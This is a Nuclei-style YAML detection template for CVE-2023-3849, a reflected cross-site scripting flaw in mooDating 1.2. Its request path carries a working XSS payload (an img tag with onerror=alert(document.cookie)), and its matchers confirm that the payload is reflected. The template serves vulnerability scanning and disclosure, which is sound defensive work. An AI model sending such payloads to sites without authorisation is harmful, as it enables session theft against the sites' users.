32 lines
1.1 KiB
YAML
32 lines
1.1 KiB
YAML
|
id: CVE-2023-3849
|
||
|
info:
|
||
|
name: mooDating 1.2 - Cross-site scripting
|
||
|
author: r3Y3r53
|
||
|
severity: medium
|
||
|
description: |
|
||
|
A vulnerability, which was classified as problematic, was found in mooSocial mooDating 1.2. Affected is an unknown function of the file /find-a-match of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely.
|
||
|
reference:
|
||
|
- https://packetstormsecurity.com/files/173691/mooDating-1.2-Cross-Site-Scripting.html
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-3849
|
||
|
classification:
|
||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||
|
cvss-score: 6.1
|
||
|
cve-id: CVE-2023-3849
|
||
|
cwe-id: CWE-79
|
||
|
metadata:
|
||
|
verified: true
|
||
|
tags: cve,cve2023,xss,unauth,moodating
|
||
|
|
||
|
http:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- '{{BaseURL}}/find-a-matchpksyk"><img%20src%3da%20onerror%3dalert(document.cookie)>s9a64?'
|
||
|
|
||
|
matchers:
|
||
|
- type: dsl
|
||
|
dsl:
|
||
|
- 'status_code == 404'
|
||
|
- 'contains(content_type, "text/html")'
|
||
|
- 'contains(body, "><img src=a onerror=alert(document.cookie)>s9a64") && contains(body, "mooDating")'
|
||
|
condition: and
|